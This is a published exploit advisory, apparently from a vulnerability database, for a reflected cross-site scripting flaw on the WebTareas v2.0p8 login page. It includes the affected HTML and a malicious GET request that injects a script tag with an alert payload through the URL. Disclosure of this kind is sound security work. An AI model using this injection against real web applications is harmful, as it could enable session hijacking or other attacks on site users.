WebTareas 2.0p8 Cross Site Scripting

2020.05.09
Credit: Bobby Cooke
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: WebTareas v2.0p8 - Login Portal - Reflected Cross Site Scripting (XSS) # Exploit Author: Bobby Cooke # Date: May 7th, 2020 # Vendor Homepage: http://webtareas.sf.net/ # Software Link: https://sourceforge.net/projects/webtareas/files/2.0p8/webTareas-v2.0p8.zip/download # Version: v2.0p8 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description: WebTareas v2.0p8 suffers from a reflected Cross Site Scripting (XSS) vulnerability on the 'login.php' webpage. When accessing the login page, the URL is reused within the webpage in an unsafe way; it is reused in the login form. # Affected HTML Source Code (Shortened with "...") 94 <div id="wtLogin">...><h1>webTareas</h1></div><form ... method="POST" action="/webtareas/general/login.php?boku"><script>alert("KAAAA-MEEHHHH-HAAAA...MEEE..HAAAA!!");</script>" name="loginForm"... 95 <input id="passwordForm" name="passwordForm" type="password" placeholder="Password"/> 96 <input class="submit-button" type="submit" name="loginSubmit" value="Log In">... # Malicious GET Request GET /webtareas/general/login.php?boku"><script>alert("KAAAA-MEEHHHH-HAAAA...MEEE..HAAAA!!");</script> HTTP/1.1 Host: 10.16.65.130 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: close Cookie: webTareasSID=url0mrcng8q22c54kt3fs0d64g


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top